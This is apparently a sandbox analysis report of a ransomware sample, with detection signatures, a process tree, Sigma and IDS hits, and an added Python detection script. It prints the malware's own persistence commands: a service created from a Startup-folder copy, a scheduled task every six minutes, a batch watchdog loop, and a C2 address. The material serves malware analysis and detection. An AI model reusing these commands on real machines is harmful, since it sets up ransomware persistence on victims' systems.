

Windows Analysis Report
8AbMCL2dxM.exe

Overview

General Information

Sample name: 8AbMCL2dxM.exe (renamed because the original name is a hash value)
Original sample name: 2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d.exe
Analysis ID: 1569976
MD5: f383db0b947e0bce25a542dd7fc11139
SHA1: 2ae37fda200d51610fbe6cad6dde08bbbb802a0a
SHA256: 2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d
Tags: exe, user-JAMESWT_MHT

Detection

RCRU64, TrojanRansom
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RCRU64 Ransomware
Yara detected TrojanRansom
AI detected suspicious sample
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 8AbMCL2dxM.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\8AbMCL2dxM.exe" MD5: F383DB0B947E0BCE25A542DD7FC11139)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 6220 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6808 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 2168 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 524 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 5056 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 4876 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 5280 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 5368 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 5476 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 6276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 3300 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 528 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 3500 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2912 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6896 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 6272 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2996 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6136 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5292 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2364 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 948 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 3500 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 1012 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5512 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 1176 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 5984 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2912 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 1052 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 3640 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6200 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 4020 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 5388 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 5588 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 1052 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 5032 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
        • WmiPrvSE.exe (PID: 516 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
      • find.exe (PID: 876 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1464 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 2168 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 6940 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 6292 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cmd.exe (PID: 2884 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 5476 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 6896 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5716 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5032 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 4152 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: F383DB0B947E0BCE25A542DD7FC11139)
    • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
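The tree above is the whole persistence story in one place, and it is worth encoding as detection logic rather than reading once. Two details to keep in mind while doing so: the 32-bit sample spawns SysWOW64 copies of cmd.exe, tasklist.exe and find.exe (MD5 D0FCE3AF..., 0A4448B3..., 15B158BC...), while the re-run started by the Microsoft_Auto_Scheduler task (every 6 minutes) goes through the native 64-bit binaries (8A2122E8..., D0A49A17..., 4BF76A28...), which is why the same file names carry two different hashes; and the S-6748.bat loop polls `tasklist /fi "ImageName eq 8AbMCL2dxM.exe"` with a 15-second `timeout` between rounds, a watchdog that knows the sample's current file name and so is generated at run time. The script below is an added example, not Joe Sandbox output and not code from the sample. It runs offline on records I built from the command lines printed above; the record field names (a loose Sysmon Event ID 1 shape) and the PIDs of the poll-loop children (10000 and up) are my assumptions, everything else (service name SqlBakup, task name, script paths, hashes) is as the report shows it.

```python
import re
from collections import defaultdict

# Constructed process-creation records mirroring the report's process tree
# (images, command lines, MD5 prefixes as printed).  Field names are a loose
# Sysmon Event ID 1 shape; the poll-loop PIDs (10000+) are invented.
SAMPLE_MD5 = "F383DB0B947E0BCE25A542DD7FC11139"
WOW = r"C:\Windows\SysWOW64"      # 32-bit sample -> its children are WoW64 binaries
STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
EVENTS = [
    dict(pid=7152, ppid=1000, image=r"C:\Users\user\Desktop\8AbMCL2dxM.exe", md5=SAMPLE_MD5,
         cmd=r'"C:\Users\user\Desktop\8AbMCL2dxM.exe"'),
    dict(pid=2884, ppid=7152, image=WOW + r"\cmd.exe", md5="D0FCE3AF",
         cmd=r'cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"'),
    dict(pid=2168, ppid=7152, image=WOW + r"\cmd.exe", md5="D0FCE3AF",
         cmd=r'cmd.exe /c sc create SqlBakup binPath= "' + STARTUP + r'\Xinfecter.exe" start=auto'),
    dict(pid=524, ppid=2168, image=WOW + r"\sc.exe", md5="D9D7684B",
         cmd=r'sc create SqlBakup binPath= "' + STARTUP + r'\Xinfecter.exe" start=auto'),
    dict(pid=5476, ppid=7152, image=WOW + r"\cmd.exe", md5="D0FCE3AF",
         cmd=r'cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat'),
    dict(pid=6276, ppid=5476, image=WOW + r"\wscript.exe", md5="FF00E048",
         cmd=r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"'),
    dict(pid=4920, ppid=6276, image=WOW + r"\cmd.exe", md5="D0FCE3AF",
         cmd=r'cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "'),
    dict(pid=5588, ppid=5388, image=WOW + r"\schtasks.exe", md5="48C2FE20",
         cmd=r"""schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f"""),
    dict(pid=3164, ppid=700, image=STARTUP + r"\Xinfecter.exe", md5=SAMPLE_MD5,
         cmd='"' + STARTUP + r'\Xinfecter.exe"'),
]
for n in range(7):   # the batch file's poll loop: tasklist / find / timeout, 7 rounds in the report
    EVENTS += [
        dict(pid=10000 + 3 * n, ppid=4920, image=WOW + r"\tasklist.exe", md5="0A4448B3",
             cmd=r'tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv'),
        dict(pid=10001 + 3 * n, ppid=4920, image=WOW + r"\find.exe", md5="15B158BC",
             cmd=r'find /I "8AbMCL2dxM.exe"'),
        dict(pid=10002 + 3 * n, ppid=4920, image=WOW + r"\timeout.exe", md5="976566BE",
             cmd="timeout /t 15 /nobreak"),
    ]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule, pid, detail) findings for one batch of process-creation records."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmd"]
        # A service whose binary lives in a user-writable directory.
        if name == "sc.exe" and re.search(r"\bcreate\b.*binpath=", cmd, re.I) and USER_WRITABLE.search(cmd):
            findings.append(("service_binpath_user_writable", e["pid"], re.search(r"create\s+(\S+)", cmd).group(1)))
        # A scheduled task that runs something out of a user directory; detail = minute interval.
        if name == "schtasks.exe" and "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
            m = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cmd, re.I)
            findings.append(("schtask_user_writable", e["pid"], int(m.group(1)) if m else None))
        # A script host running a script that sits directly in the AppData root.
        if name in ("wscript.exe", "cscript.exe") and re.search(r'\\AppData\\[^\\"]+\.(vbs|vbe|js|jse|wsf)\b', cmd, re.I):
            findings.append(("wsh_script_in_appdata_root", e["pid"], cmd.rsplit("\\", 1)[-1].strip('"')))
        # The submitted sample's own hash executing from the Startup folder (self-copy).
        if e["md5"] == SAMPLE_MD5 and re.search(r"\\Start Menu\\Programs\\Startup\\", e["image"], re.I):
            findings.append(("sample_copy_in_startup", e["pid"], e["image"]))
    # Watchdog: one parent repeatedly pairing `tasklist /fi ...` with `timeout`.
    for ppid, kids in children.items():
        polls = [k for k in kids if basename(k["image"]) == "tasklist.exe" and "/fi" in k["cmd"].lower()]
        waits = [k for k in kids if basename(k["image"]) == "timeout.exe"]
        if len(polls) >= 3 and len(waits) >= 3:
            target = re.search(r'imagename eq ([^"]+)', polls[0]["cmd"], re.I).group(1)
            findings.append(("tasklist_timeout_watchdog", ppid, target))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"{rule:32} pid={pid:<6} {detail}")
```

The watchdog rule is keyed on the parent, not on any single child, because each `tasklist` or `timeout` on its own is benign; it is the repetition under one cmd.exe that carries the signal. The `sc create` rule does not need the binary to be in the Startup folder specifically: any service whose binPath= resolves into a user-writable directory is worth a ticket, and the Startup folder is just the variant this sample uses.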
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: 8AbMCL2dxM.exe PID: 7152 | JoeSecurity_rcru64 | Yara detected RCRU64 Ransomware | Joe Security |
Process Memory Space: 8AbMCL2dxM.exe PID: 7152 | JoeSecurity_TrojanRansom | Yara detected TrojanRansom | Joe Security |
Process Memory Space: Xinfecter.exe PID: 3164 | JoeSecurity_TrojanRansom | Yara detected TrojanRansom | Joe Security |

        System Summary

Source: Threat created | Author: @SBousseaden (detection), Thomas Patzke (rule) | Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 5476, StartAddress: 89DBBCC0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 5476
Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 5476, StartAddress: 89DBBCC0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 5476
Note on the two remote-thread hits above: both carry SourceProcessId 5476 and TargetProcessId 5476, and in the process tree PID 5476 belongs to a SysWOW64 cmd.exe in the first run and to the System32 wscript.exe in the run started by the scheduled task. A thread-creation event whose source and target are the same PID is not a remote thread, so treat these two Sigma matches as PID-reuse ambiguity to be confirmed against the raw Sysmon EventID 8 records rather than as evidence of injection.
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\8AbMCL2dxM.exe, ProcessId: 7152, TargetFilename: C:\Users\user\AppData\S-6748.bat
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2168, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 524, ProcessName: sc.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5476, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 6276, ProcessName: wscript.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\8AbMCL2dxM.exe, ProcessId: 7152, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5476, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 6276, ProcessName: wscript.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2168, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 524, ProcessName: sc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T13:39:10.708832+0100 | 2045821 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49742 | 185.147.34.53 | 3586 | TCP


        AV Detection

Source: 8AbMCL2dxM.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Avira: detection malicious, Label: HEUR/AGEN.1353205
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | ReversingLabs: Detection: 76%
Source: 8AbMCL2dxM.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Joe Sandbox ML: detected
Source: 8AbMCL2dxM.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00914A30 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,1_2_00914A30
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00914FF0 CryptReleaseContext,1_2_00914FF0
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00915100 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,1_2_00915100
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00914B90 CryptAcquireContextA,GetLastError,CryptReleaseContext,1_2_00914B90
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00914F20 CryptReleaseContext,1_2_00914F20
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00914F60 CryptGenRandom,__CxxThrowException@8,1_2_00914F60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00274A30 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,42_2_00274A30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00274FF0 CryptReleaseContext,42_2_00274FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00275100 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,42_2_00275100
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00274B90 CryptAcquireContextA,GetLastError,CryptReleaseContext,42_2_00274B90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00274F20 CryptReleaseContext,42_2_00274F20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00274F60 CryptGenRandom,__CxxThrowException@8,42_2_00274F60
Source: 8AbMCL2dxM.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8AbMCL2dxM.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File opened (drive roots, in the order the report lists them): z: x: v: t: r: p: n: l: j: h: f: b: y: w: u: s: q: o: m: k: i: g: e: a:
Source: C:\Windows\System32\cmd.exe | File opened: c:
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C4CC0 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,1_2_008C4CC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00224CC0 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,42_2_00224CC0
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CA2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,1_2_008CA2AA
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0097C26B FindFirstFileExA,1_2_0097C26B
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C8A30 SetErrorMode,FindFirstFileW,1_2_008C8A30
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C8B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,1_2_008C8B70
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CB740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,1_2_008CB740
